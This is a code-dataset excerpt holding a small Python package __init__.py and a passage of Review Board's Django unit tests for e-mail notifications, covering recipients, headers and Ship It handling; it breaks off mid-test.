| 63
|
py
|
Python
|
sixty/__init__.py
|
ruizca/sixty
|
11bd3c0e7291fa7a5892db221f69ea472e610e76
|
[
"BSD-3-Clause"
] | null | null | null |
sixty/__init__.py
|
ruizca/sixty
|
11bd3c0e7291fa7a5892db221f69ea472e610e76
|
[
"BSD-3-Clause"
] | null | null | null |
sixty/__init__.py
|
ruizca/sixty
|
11bd3c0e7291fa7a5892db221f69ea472e610e76
|
[
"BSD-3-Clause"
] | null | null | null |
# Re-export the public API of the .sixty submodule at package level.
from .sixty import *
# Explicitly pull in these two helpers as well: their leading underscore
# presumably keeps them out of the wildcard import above — verify against
# sixty.py's __all__ if one is defined.
from .sixty import _sixte_dir, _simput_dir
| 31.5
| 42
| 0.809524
| 10
| 63
| 4.7
| 0.6
| 0.382979
| 0.638298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126984
| 63
| 2
| 42
| 31.5
| 0.854545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b972aff8877b7202673b601ba6fd06410b69423a
| 113,125
|
py
|
Python
|
reviewboard/notifications/tests.py
|
bcskda/reviewboard
|
280069e31a306fae11aba1a616d52904c49c5299
|
[
"MIT"
] | 1
|
2017-01-16T09:39:15.000Z
|
2017-01-16T09:39:15.000Z
|
reviewboard/notifications/tests.py
|
bcskda/reviewboard
|
280069e31a306fae11aba1a616d52904c49c5299
|
[
"MIT"
] | null | null | null |
reviewboard/notifications/tests.py
|
bcskda/reviewboard
|
280069e31a306fae11aba1a616d52904c49c5299
|
[
"MIT"
] | 1
|
2018-01-15T19:13:49.000Z
|
2018-01-15T19:13:49.000Z
|
from __future__ import unicode_literals
import logging
from django.conf import settings
from django.contrib.auth.models import User
from django.core import mail
from django.template import TemplateSyntaxError
from django.utils.datastructures import MultiValueDict
from django.utils.six.moves.urllib.request import urlopen
from djblets.siteconfig.models import SiteConfiguration
from djblets.testing.decorators import add_fixtures
from kgb import SpyAgency
from reviewboard.accounts.models import Profile, ReviewRequestVisit
from reviewboard.admin.siteconfig import load_site_config
from reviewboard.diffviewer.models import FileDiff
from reviewboard.notifications.email import (build_email_address,
build_recipients,
get_email_address_for_user,
get_email_addresses_for_group,
recipients_to_addresses,
send_review_mail)
from reviewboard.notifications.models import WebHookTarget
from reviewboard.notifications.webhooks import (FakeHTTPRequest,
dispatch_webhook_event,
render_custom_content)
from reviewboard.reviews.models import (Group,
Review,
ReviewRequest,
ReviewRequestDraft)
from reviewboard.scmtools.core import PRE_CREATION
from reviewboard.site.models import LocalSite
from reviewboard.testing import TestCase
from reviewboard.webapi.models import WebAPIToken
# Dotted path to Django's console e-mail backend. Not referenced within
# this chunk; presumably used by tests further down to swap the outgoing
# mail backend — confirm against the rest of the file.
_CONSOLE_EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
class EmailTestHelper(object):
    """Mixin providing common e-mail assertions for notification tests.

    Resets the Django test outbox in setUp and records the expected
    sender address.
    """

    def setUp(self):
        super(EmailTestHelper, self).setUp()

        # Start every test with an empty outbox.
        mail.outbox = []
        self.sender = 'noreply@example.com'

    def assertValidRecipients(self, user_list, group_list=()):
        """Assert the first outbox message reaches exactly these recipients.

        Checks that To + Cc of mail.outbox[0] contains one address per
        user in ``user_list`` plus every member address of each group
        named in ``group_list`` (non-Local-Site groups only), and nothing
        else (by count).

        Note: the default was previously a mutable ``[]``; an immutable
        tuple avoids the shared-mutable-default pitfall and is otherwise
        equivalent (only len() and a ``name__in`` filter are applied).
        """
        recipient_list = mail.outbox[0].to + mail.outbox[0].cc
        self.assertEqual(len(recipient_list), len(user_list) + len(group_list))

        for user in user_list:
            self.assertTrue(get_email_address_for_user(
                User.objects.get(username=user)) in recipient_list,
                "user %s was not found in the recipient list" % user)

        groups = Group.objects.filter(name__in=group_list, local_site=None)

        for group in groups:
            for address in get_email_addresses_for_group(group):
                self.assertTrue(
                    address in recipient_list,
                    "group %s was not found in the recipient list" % address)
class UserEmailTests(EmailTestHelper, TestCase):
    """Tests for the e-mail sent when a new user registers."""

    def setUp(self):
        super(UserEmailTests, self).setUp()

        siteconfig = SiteConfiguration.objects.get_current()
        siteconfig.set("mail_send_new_user_mail", True)
        siteconfig.save()
        load_site_config()

    def test_new_user_email(self):
        """
        Testing sending an e-mail after a new user has successfully registered.
        """
        form_data = {
            'username': 'NewUser',
            'password1': 'password',
            'password2': 'password',
            'email': 'newuser@example.com',
            'first_name': 'New',
            'last_name': 'User',
        }

        # djblets needs to validate cookies on the second request, so the
        # registration page is fetched once before posting the form.
        self.client.get('/account/register/')
        self.client.post('/account/register/', form_data)

        siteconfig = SiteConfiguration.objects.get_current()
        expected_to = build_email_address(siteconfig.get('site_admin_name'),
                                          siteconfig.get('site_admin_email'))

        self.assertEqual(len(mail.outbox), 1)

        message = mail.outbox[0]
        self.assertEqual(message.subject,
                         "New Review Board user registration for NewUser")
        self.assertEqual(message.from_email, self.sender)
        self.assertEqual(message.extra_headers['From'], settings.SERVER_EMAIL)
        self.assertEqual(message.to[0], expected_to)
class ReviewRequestEmailTests(EmailTestHelper, SpyAgency, TestCase):
"""Tests the e-mail support."""
fixtures = ['test_users']
def setUp(self):
    """Enable review e-mail sending and set the default From address."""
    super(ReviewRequestEmailTests, self).setUp()

    config = SiteConfiguration.objects.get_current()
    config.set("mail_send_review_mail", True)
    config.set("mail_default_from", self.sender)
    config.save()
    load_site_config()
def test_new_review_request_email(self):
    """Testing sending an e-mail when creating a new review request"""
    review_request = self.create_review_request(
        summary='My test review request')

    for username in ('grumpy', 'doc'):
        review_request.target_people.add(
            User.objects.get(username=username))

    review_request.publish(review_request.submitter)

    submitter_email = get_email_address_for_user(review_request.submitter)

    self.assertEqual(len(mail.outbox), 1)

    email = mail.outbox[0]
    self.assertEqual(email.from_email, self.sender)
    self.assertEqual(email.extra_headers['From'], submitter_email)
    self.assertEqual(email.subject,
                     'Review Request %s: My test review request'
                     % review_request.pk)
    self.assertValidRecipients(['grumpy', 'doc'])

    self.assertEqual(email.message()['Sender'],
                     self._get_sender(review_request.submitter))
def test_review_request_email_local_site_group(self):
    """Testing sending email when a group member is part of a Local Site"""
    # Regression test for bug 3581.
    local_site = LocalSite.objects.create(name=self.local_site_name)

    member = User.objects.get(username='grumpy')
    local_site.users.add(member)
    local_site.admins.add(member)
    local_site.save()

    group = self.create_review_group()
    group.users.add(member)
    group.save()

    review_request = self.create_review_request()
    review_request.target_groups.add(group)
    review_request.publish(review_request.submitter)

    self.assertEqual(len(mail.outbox), 1)
    self.assertValidRecipients(['doc', 'grumpy'])
def test_review_email(self):
    """Testing sending an e-mail when replying to a review request"""
    review_request = self.create_review_request(
        summary='My test review request')
    review_request.target_people.add(User.objects.get(username='grumpy'))
    review_request.target_people.add(User.objects.get(username='doc'))
    review_request.publish(review_request.submitter)

    # Clear the outbox of the publish notification; only the review's
    # e-mail should be inspected below.
    mail.outbox = []

    review = self.create_review(review_request=review_request)
    review.publish()

    from_email = get_email_address_for_user(review.user)

    self.assertEqual(len(mail.outbox), 1)

    email = mail.outbox[0]
    # Envelope sender stays the server-wide sender; the reviewer's
    # address appears in the From header.
    self.assertEqual(email.from_email, self.sender)
    self.assertEqual(email.extra_headers['From'], from_email)
    self.assertEqual(email._headers['X-ReviewBoard-URL'],
                     'http://example.com/')
    self.assertEqual(email._headers['X-ReviewRequest-URL'],
                     'http://example.com/r/%s/'
                     % review_request.display_id)
    self.assertEqual(email.subject,
                     'Re: Review Request %s: My test review request'
                     % review_request.display_id)
    self.assertValidRecipients([
        review_request.submitter.username,
        'grumpy',
        'doc',
    ])

    message = email.message()
    self.assertEqual(message['Sender'], self._get_sender(review.user))
@add_fixtures(['test_site'])
def test_review_email_with_site(self):
    """Testing sending an e-mail when replying to a review request
    on a Local Site
    """
    review_request = self.create_review_request(
        summary='My test review request',
        with_local_site=True)
    review_request.target_people.add(User.objects.get(username='grumpy'))
    review_request.target_people.add(User.objects.get(username='doc'))
    review_request.publish(review_request.submitter)

    # Ensure all the reviewers are on the site.
    site = review_request.local_site
    site.users.add(*list(review_request.target_people.all()))

    # Clear the outbox.
    mail.outbox = []

    review = self.create_review(review_request=review_request)
    review.publish()

    from_email = get_email_address_for_user(review.user)

    self.assertEqual(len(mail.outbox), 1)

    email = mail.outbox[0]
    self.assertEqual(email.from_email, self.sender)
    self.assertEqual(email.extra_headers['From'], from_email)
    # Both URL headers must carry the Local Site prefix.
    self.assertEqual(email._headers['X-ReviewBoard-URL'],
                     'http://example.com/s/local-site-1/')
    self.assertEqual(email._headers['X-ReviewRequest-URL'],
                     'http://example.com/s/local-site-1/r/%s/'
                     % review_request.display_id)
    self.assertEqual(email.subject,
                     'Re: Review Request %s: My test review request'
                     % review_request.display_id)
    self.assertValidRecipients([
        review_request.submitter.username,
        'grumpy',
        'doc',
    ])

    message = email.message()
    self.assertEqual(message['Sender'], self._get_sender(review.user))
def test_profile_should_send_email_setting(self):
    """Testing the Profile.should_send_email setting"""
    user = User.objects.get(username='grumpy')

    # Opt this user out of e-mail notifications.
    profile = user.get_profile()
    profile.should_send_email = False
    profile.save()

    review_request = self.create_review_request(
        summary='My test review request')
    review_request.target_people.add(user)
    review_request.target_people.add(User.objects.get(username='doc'))
    review_request.publish(review_request.submitter)

    # Only the opted-in reviewer receives the e-mail.
    self.assertEqual(len(mail.outbox), 1)
    self.assertValidRecipients(['doc'])
def test_review_close_no_email(self):
    """Tests e-mail is not generated when a review is closed and e-mail
    setting is False
    """
    review_request = self.create_review_request()
    review_request.publish(review_request.submitter)

    # Throw away the publish notification.
    mail.outbox = []

    review_request.close(ReviewRequest.SUBMITTED, review_request.submitter)

    # mail_send_review_close_mail is off by default, so nothing is sent.
    self.assertEqual(len(mail.outbox), 0)
def test_review_close_with_email(self):
    """Tests e-mail is generated when a review is closed and e-mail setting
    is True
    """
    siteconfig = SiteConfiguration.objects.get_current()
    siteconfig.set("mail_send_review_close_mail", True)
    siteconfig.save()
    load_site_config()

    review_request = self.create_review_request()
    review_request.publish(review_request.submitter)

    # Clear the outbox.
    mail.outbox = []

    review_request.close(ReviewRequest.SUBMITTED, review_request.submitter)

    self.assertEqual(len(mail.outbox), 1)

    message = mail.outbox[0].message()
    self.assertTrue("This change has been marked as submitted"
                    in message.as_string())

    # Reset settings for review close requests.
    # The siteconfig setting is global state, so it must be restored here
    # for the benefit of the other tests in this class.
    siteconfig.set("mail_send_review_close_mail", False)
    siteconfig.save()
    load_site_config()
def test_review_to_submitter_only(self):
    """Test that e-mails from reviews published to the submitter only will
    only go to the submitter and the reviewer
    """
    siteconfig = SiteConfiguration.objects.get_current()
    siteconfig.set('mail_send_review_mail', True)
    siteconfig.save()

    review_request = self.create_review_request(public=True, publish=False)
    review_request.target_people = [User.objects.get(username='grumpy')]
    review_request.save()

    review = self.create_review(review_request=review_request,
                                publish=False)
    review.publish(to_submitter_only=True)

    self.assertEqual(len(mail.outbox), 1)

    message = mail.outbox[0]

    # Nobody is CC'd; only the reviewer and the submitter appear in To.
    self.assertEqual(message.cc, [])
    self.assertEqual(len(message.to), 2)
    self.assertEqual(
        set(message.to),
        set([get_email_address_for_user(review.user),
             get_email_address_for_user(review_request.submitter)]))
def test_review_reply_email(self):
    """Testing sending an e-mail when replying to a review"""
    review_request = self.create_review_request(
        summary='My test review request')
    review_request.publish(review_request.submitter)

    base_review = self.create_review(review_request=review_request)
    base_review.publish()

    # Clear the outbox so only the reply's e-mail is inspected.
    mail.outbox = []

    reply = self.create_reply(base_review)
    reply.publish()

    from_email = get_email_address_for_user(reply.user)

    self.assertEqual(len(mail.outbox), 1)
    self.assertEqual(mail.outbox[0].from_email, self.sender)
    self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
    self.assertEqual(mail.outbox[0].subject,
                     'Re: Review Request %s: My test review request'
                     % review_request.pk)
    # Submitter, original reviewer and replier are all recipients.
    self.assertValidRecipients([
        review_request.submitter.username,
        base_review.user.username,
        reply.user.username,
    ])

    message = mail.outbox[0].message()
    self.assertEqual(message['Sender'], self._get_sender(reply.user))
def test_update_review_request_email(self):
    """Testing sending an e-mail when updating a review request"""
    group = Group.objects.create(name='devgroup',
                                 mailing_list='devgroup@example.com')

    review_request = self.create_review_request(
        summary='My test review request')
    review_request.target_groups.add(group)
    # Presumably marks the request as having been e-mailed before, so
    # this publish is treated as an update (note the 'Re:' subject
    # asserted below) — verify against send_review_mail.
    review_request.email_message_id = "junk"
    review_request.publish(review_request.submitter)

    from_email = get_email_address_for_user(review_request.submitter)

    self.assertEqual(len(mail.outbox), 1)
    self.assertEqual(mail.outbox[0].from_email, self.sender)
    self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
    self.assertEqual(mail.outbox[0].subject,
                     'Re: Review Request %s: My test review request'
                     % review_request.pk)
    self.assertValidRecipients([review_request.submitter.username],
                               ['devgroup'])

    message = mail.outbox[0].message()
    self.assertEqual(message['Sender'],
                     self._get_sender(review_request.submitter))
def test_add_reviewer_review_request_email(self):
    """Testing limited e-mail recipients
    when adding a reviewer to an existing review request
    """
    review_request = self.create_review_request(
        summary='My test review request',
        public=True)
    # Mark the request as previously e-mailed so the draft publish below
    # counts as an update rather than an initial publish.
    review_request.email_message_id = "junk"
    review_request.target_people.add(User.objects.get(username='dopey'))
    review_request.save()

    draft = ReviewRequestDraft.create(review_request)
    draft.target_people.add(User.objects.get(username='grumpy'))
    draft.publish(user=review_request.submitter)

    from_email = get_email_address_for_user(review_request.submitter)

    self.assertEqual(len(mail.outbox), 1)
    self.assertEqual(mail.outbox[0].from_email, self.sender)
    self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
    self.assertEqual(mail.outbox[0].subject,
                     'Re: Review Request %s: My test review request'
                     % review_request.pk)

    # The only included users should be the submitter and 'grumpy' (not
    # 'dopey', since he was already included on the review request earlier)
    self.assertValidRecipients([review_request.submitter.username,
                                'grumpy'])

    message = mail.outbox[0].message()
    self.assertEqual(message['Sender'],
                     self._get_sender(review_request.submitter))
def test_add_group_review_request_email(self):
    """Testing limited e-mail recipients
    when adding a group to an existing review request
    """
    existing_group = Group.objects.create(
        name='existing', mailing_list='existing@example.com')

    review_request = self.create_review_request(
        summary='My test review request',
        public=True)
    # Mark the request as previously e-mailed so the draft publish below
    # counts as an update rather than an initial publish.
    review_request.email_message_id = "junk"
    review_request.target_groups.add(existing_group)
    review_request.target_people.add(User.objects.get(username='dopey'))
    review_request.save()

    new_group = Group.objects.create(name='devgroup',
                                     mailing_list='devgroup@example.com')
    draft = ReviewRequestDraft.create(review_request)
    draft.target_groups.add(new_group)
    draft.publish(user=review_request.submitter)

    from_email = get_email_address_for_user(review_request.submitter)

    self.assertEqual(len(mail.outbox), 1)
    self.assertEqual(mail.outbox[0].from_email, self.sender)
    self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
    self.assertEqual(mail.outbox[0].subject,
                     'Re: Review Request %s: My test review request'
                     % review_request.pk)

    # The only included users should be the submitter and 'devgroup' (not
    # 'dopey' or 'existing', since they were already included on the
    # review request earlier)
    self.assertValidRecipients([review_request.submitter.username],
                               ['devgroup'])

    message = mail.outbox[0].message()
    self.assertEqual(message['Sender'],
                     self._get_sender(review_request.submitter))
def test_limited_recipients_other_fields(self):
    """Testing that recipient limiting only happens when adding reviewers
    """
    review_request = self.create_review_request(
        summary='My test review request',
        public=True)
    # Mark the request as previously e-mailed so the draft publish below
    # counts as an update rather than an initial publish.
    review_request.email_message_id = "junk"
    review_request.target_people.add(User.objects.get(username='dopey'))
    review_request.save()

    # Changing the summary (not just adding reviewers) means everyone,
    # including the pre-existing reviewer, gets notified.
    draft = ReviewRequestDraft.create(review_request)
    draft.summary = 'Changed summary'
    draft.target_people.add(User.objects.get(username='grumpy'))
    draft.publish(user=review_request.submitter)

    from_email = get_email_address_for_user(review_request.submitter)

    self.assertEqual(len(mail.outbox), 1)
    self.assertEqual(mail.outbox[0].from_email, self.sender)
    self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
    self.assertEqual(mail.outbox[0].subject,
                     'Re: Review Request %s: Changed summary'
                     % review_request.pk)
    self.assertValidRecipients([review_request.submitter.username,
                                'dopey', 'grumpy'])

    message = mail.outbox[0].message()
    self.assertEqual(message['Sender'],
                     self._get_sender(review_request.submitter))
def test_limited_recipients_no_email(self):
    """Testing limited e-mail recipients when operation results in zero
    recipients
    """
    dopey = User.objects.get(username='dopey')

    review_request = self.create_review_request(
        summary='My test review request',
        public=True)
    review_request.email_message_id = "junk"
    review_request.target_people.add(dopey)
    review_request.save()

    # The submitter opts out of e-mail about their own updates.
    profile = Profile.objects.get_or_create(
        user=review_request.submitter)[0]
    profile.should_send_own_updates = False
    profile.save()

    # Removing the sole reviewer leaves nobody to notify.
    draft = ReviewRequestDraft.create(review_request)
    draft.target_people.remove(dopey)
    draft.publish(user=review_request.submitter)

    self.assertEqual(len(mail.outbox), 0)
def test_recipients_with_muted_review_requests(self):
    """Testing e-mail recipients when users mute a review request"""
    dopey = User.objects.get(username='dopey')
    admin = User.objects.get(username='admin')

    group = Group.objects.create(name='group')
    group.users.add(admin)
    group.save()

    review_request = self.create_review_request(
        summary='My test review request',
        public=True)
    review_request.target_people.add(dopey)
    review_request.target_people.add(User.objects.get(username='grumpy'))
    review_request.target_groups.add(group)
    review_request.save()

    # Both dopey (direct reviewer) and admin (via the group) mute the
    # review request; neither should appear in the recipients below.
    visit = self.create_visit(review_request, ReviewRequestVisit.MUTED,
                              dopey)
    visit.save()

    visit = self.create_visit(review_request, ReviewRequestVisit.MUTED,
                              admin)
    visit.save()

    draft = ReviewRequestDraft.create(review_request)
    draft.summary = 'Summary changed'
    draft.publish(user=review_request.submitter)

    self.assertEqual(len(mail.outbox), 1)
    self.assertValidRecipients(['doc', 'grumpy'])
def test_group_member_not_receive_email(self):
    """Testing sending review e-mails and filtering out the review
    submitter when they are part of a review group assigned to the request
    """
    # See issue 3985.
    submitter = User.objects.get(username='doc')
    profile = Profile.objects.get_or_create(user=submitter)[0]
    # The review's author opts out of e-mail about their own updates.
    profile.should_send_own_updates = False
    profile.save()

    reviewer = User.objects.get(username='dopey')

    group = self.create_review_group()
    group.users.add(submitter)

    review_request = self.create_review_request(public=True)
    review_request.target_groups.add(group)
    review_request.target_people.add(reviewer)
    review_request.save()

    review = self.create_review(review_request, user=submitter)
    review.publish()

    self.assertEqual(len(mail.outbox), 1)

    # Even though `submitter` is in the targeted group, they must not be
    # e-mailed about their own review.
    msg = mail.outbox[0]
    self.assertListEqual(
        msg.to,
        [get_email_address_for_user(reviewer)])
    self.assertListEqual(msg.cc, [])
    def test_local_site_user_filters(self):
        """Testing sending e-mails and filtering out users not on a local site
        """
        test_site = LocalSite.objects.create(name=self.local_site_name)
        # Users that belong to the Local Site (as admin or member) and
        # should therefore receive e-mail.
        site_user1 = User.objects.create(
            username='site_user1',
            email='site_user1@example.com')
        site_user2 = User.objects.create(
            username='site_user2',
            email='site_user2@example.com')
        site_user3 = User.objects.create(
            username='site_user3',
            email='site_user3@example.com')
        site_user4 = User.objects.create(
            username='site_user4',
            email='site_user4@example.com')
        site_user5 = User.objects.create(
            username='site_user5',
            email='site_user5@example.com')
        # Users outside the Local Site; these must be filtered out even if
        # they are reviewers, group members, or have posted reviews.
        non_site_user1 = User.objects.create(
            username='non_site_user1',
            email='non_site_user1@example.com')
        non_site_user2 = User.objects.create(
            username='non_site_user2',
            email='non_site_user2@example.com')
        non_site_user3 = User.objects.create(
            username='non_site_user3',
            email='non_site_user3@example.com')
        test_site.admins.add(site_user1)
        test_site.users.add(site_user2)
        test_site.users.add(site_user3)
        test_site.users.add(site_user4)
        test_site.users.add(site_user5)
        group = Group.objects.create(name='my-group',
                                     display_name='My Group',
                                     local_site=test_site)
        group.users.add(site_user5)
        group.users.add(non_site_user3)
        review_request = self.create_review_request(with_local_site=True,
                                                    local_id=123)
        # A pre-existing message ID makes this look like an update rather
        # than a brand-new review request.
        review_request.email_message_id = "junk"
        review_request.target_people = [site_user1, site_user2, site_user3,
                                        non_site_user1]
        review_request.target_groups = [group]
        review = Review.objects.create(review_request=review_request,
                                       user=site_user4)
        review.publish()
        review = Review.objects.create(review_request=review_request,
                                       user=non_site_user2)
        review.publish()
        from_email = get_email_address_for_user(review_request.submitter)
        # Now that we're set up, send another e-mail.
        mail.outbox = []
        review_request.publish(review_request.submitter)
        self.assertEqual(len(mail.outbox), 1)
        self.assertEqual(mail.outbox[0].from_email, self.sender)
        self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
        # All site members (and the submitter) appear; no non-site users.
        self.assertValidRecipients(
            ['site_user1', 'site_user2', 'site_user3', 'site_user4',
             'site_user5', review_request.submitter.username], [])
        message = mail.outbox[0].message()
        self.assertEqual(message['Sender'],
                         self._get_sender(review_request.submitter))
    def test_review_request_email_with_unicode_summary(self):
        """Testing sending a review request e-mail with a unicode subject"""
        self.spy_on(logging.exception)
        # The console backend forces full message rendering; the test passes
        # if publishing succeeds and no encoding error gets logged.
        with self.settings(EMAIL_BACKEND=_CONSOLE_EMAIL_BACKEND):
            review_request = self.create_review_request()
            review_request.summary = '\ud83d\ude04'
            review_request.target_people.add(User.objects.get(
                username='grumpy'))
            review_request.target_people.add(User.objects.get(username='doc'))
            review_request.publish(review_request.submitter)
            self.assertIsNotNone(review_request.email_message_id)
            self.assertFalse(logging.exception.spy.called)
    def test_review_request_email_with_unicode_description(self):
        """Testing sending a review request e-mail with a unicode
        description
        """
        self.spy_on(logging.exception)
        # As with the unicode-summary test: render through the console
        # backend and ensure no exception is logged during encoding.
        with self.settings(EMAIL_BACKEND=_CONSOLE_EMAIL_BACKEND):
            review_request = self.create_review_request()
            review_request.description = '\ud83d\ude04'
            review_request.target_people.add(
                User.objects.get(username='grumpy'))
            review_request.target_people.add(
                User.objects.get(username='doc'))
            review_request.publish(review_request.submitter)
            self.assertIsNotNone(review_request.email_message_id)
            self.assertFalse(logging.exception.spy.called)
    @add_fixtures(['test_scmtools'])
    def test_review_request_email_with_added_file(self):
        """Testing sending a review request e-mail with added files in the
        diffset
        """
        repository = self.create_repository(tool_name='Test')
        review_request = self.create_review_request(repository=repository)
        diffset = self.create_diffset(review_request=review_request)
        filediff = self.create_filediff(diffset=diffset,
                                        source_file='/dev/null',
                                        source_revision=PRE_CREATION)
        review_request.publish(review_request.submitter)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        # For a newly-added file, only the destination path should be
        # listed in the X-ReviewBoard-Diff-For headers (not /dev/null).
        self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
        diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
        self.assertEqual(len(diff_headers), 1)
        self.assertFalse(filediff.source_file in diff_headers)
        self.assertTrue(filediff.dest_file in diff_headers)
    @add_fixtures(['test_scmtools'])
    def test_review_request_email_with_deleted_file(self):
        """Testing sending a review request e-mail with deleted files in the
        diffset
        """
        repository = self.create_repository(tool_name='Test')
        review_request = self.create_review_request(repository=repository)
        diffset = self.create_diffset(review_request=review_request)
        filediff = self.create_filediff(diffset=diffset,
                                        dest_file='/dev/null',
                                        status=FileDiff.DELETED)
        review_request.publish(review_request.submitter)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        # For a deleted file, only the source path should be listed in the
        # X-ReviewBoard-Diff-For headers (not /dev/null).
        self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
        diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
        self.assertEqual(len(diff_headers), 1)
        self.assertTrue(filediff.source_file in diff_headers)
        self.assertFalse(filediff.dest_file in diff_headers)
    @add_fixtures(['test_scmtools'])
    def test_review_request_email_with_moved_file(self):
        """Testing sending a review request e-mail with moved files in the
        diffset
        """
        repository = self.create_repository(tool_name='Test')
        review_request = self.create_review_request(repository=repository)
        diffset = self.create_diffset(review_request=review_request)
        filediff = self.create_filediff(diffset=diffset,
                                        source_file='foo',
                                        dest_file='bar',
                                        status=FileDiff.MOVED)
        review_request.publish(review_request.submitter)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        # A moved file contributes both its old and new paths to the
        # X-ReviewBoard-Diff-For headers.
        self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
        diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
        self.assertEqual(len(diff_headers), 2)
        self.assertTrue(filediff.source_file in diff_headers)
        self.assertTrue(filediff.dest_file in diff_headers)
    @add_fixtures(['test_scmtools'])
    def test_review_request_email_with_copied_file(self):
        """Testing sending a review request e-mail with copied files in the
        diffset
        """
        repository = self.create_repository(tool_name='Test')
        review_request = self.create_review_request(repository=repository)
        diffset = self.create_diffset(review_request=review_request)
        filediff = self.create_filediff(diffset=diffset,
                                        source_file='foo',
                                        dest_file='bar',
                                        status=FileDiff.COPIED)
        review_request.publish(review_request.submitter)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        # A copied file, like a moved one, contributes both paths to the
        # X-ReviewBoard-Diff-For headers.
        self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
        diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
        self.assertEqual(len(diff_headers), 2)
        self.assertTrue(filediff.source_file in diff_headers)
        self.assertTrue(filediff.dest_file in diff_headers)
    @add_fixtures(['test_scmtools'])
    def test_review_request_email_with_multiple_files(self):
        """Testing sending a review request e-mail with multiple files in the
        diffset
        """
        repository = self.create_repository(tool_name='Test')
        review_request = self.create_review_request(repository=repository)
        diffset = self.create_diffset(review_request=review_request)
        filediffs = [
            self.create_filediff(diffset=diffset,
                                 source_file='foo',
                                 dest_file='bar',
                                 status=FileDiff.MOVED),
            self.create_filediff(diffset=diffset,
                                 source_file='baz',
                                 dest_file='/dev/null',
                                 status=FileDiff.DELETED)
        ]
        review_request.publish(review_request.submitter)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
        diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
        # Expect 3 header values: both paths of the moved file plus the
        # source path of the deleted file (/dev/null is excluded).
        self.assertEqual(len(diff_headers), 3)
        self.assertTrue(filediffs[0].source_file in diff_headers)
        self.assertTrue(filediffs[0].dest_file in diff_headers)
        self.assertTrue(filediffs[1].source_file in diff_headers)
        self.assertFalse(filediffs[1].dest_file in diff_headers)
def test_extra_headers_dict(self):
"""Testing sending extra headers as a dict with an e-mail message"""
review_request = self.create_review_request()
submitter = review_request.submitter
send_review_mail(submitter,
review_request,
'Foo',
None,
[submitter],
[],
'notifications/review_request_email.txt',
'notifications/review_request_email.html',
extra_headers={
'X-Foo': 'Bar'
})
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-Foo', message._headers)
self.assertEqual(message._headers['X-Foo'], 'Bar')
def test_extra_headers_multivalue_dict(self):
"""Testing sending extra headers as a MultiValueDict with an e-mail
message
"""
header_values = ['Bar', 'Baz']
review_request = self.create_review_request()
submitter = review_request.submitter
send_review_mail(review_request.submitter,
review_request,
'Foo',
None,
[submitter],
[],
'notifications/review_request_email.txt',
'notifications/review_request_email.html',
extra_headers=MultiValueDict({
'X-Foo': header_values,
}))
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-Foo', message._headers)
self.assertEqual(set(message._headers.getlist('X-Foo')),
set(header_values))
    def test_review_no_shipit_headers(self):
        """Testing sending a review e-mail without a 'Ship It!'"""
        review_request = self.create_review_request(public=True)
        # The body says "Ship It!" but ship_it is not set, so no ShipIt
        # headers should be added.
        self.create_review(review_request,
                           body_top=Review.SHIP_IT_TEXT,
                           body_bottom='',
                           publish=True)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertNotIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                         message.message().as_string())
    def test_review_shipit_only_headers(self):
        """Testing sending a review e-mail with only a 'Ship It!'"""
        review_request = self.create_review_request(public=True)
        # ship_it=True with no extra content should set both the ShipIt
        # and ShipIt-Only headers.
        self.create_review(review_request,
                           body_top=Review.SHIP_IT_TEXT,
                           body_bottom='',
                           ship_it=True,
                           publish=True)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                         message.message().as_string())
    def test_review_shipit_only_headers_no_text(self):
        """Testing sending a review e-mail with only a 'Ship It!' and no text
        """
        review_request = self.create_review_request(public=True)
        # Even with empty body text, ship_it=True alone counts as a
        # "Ship It only" review.
        self.create_review(review_request,
                           body_top='',
                           body_bottom='',
                           ship_it=True,
                           publish=True)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                         message.message().as_string())
    def test_review_shipit_headers_custom_top_text(self):
        """Testing sending a review e-mail with a 'Ship It' and custom top text
